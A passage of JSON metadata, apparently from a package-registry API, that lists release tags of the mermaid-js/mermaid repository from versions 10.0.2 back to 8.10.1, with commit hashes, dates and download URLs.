s/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid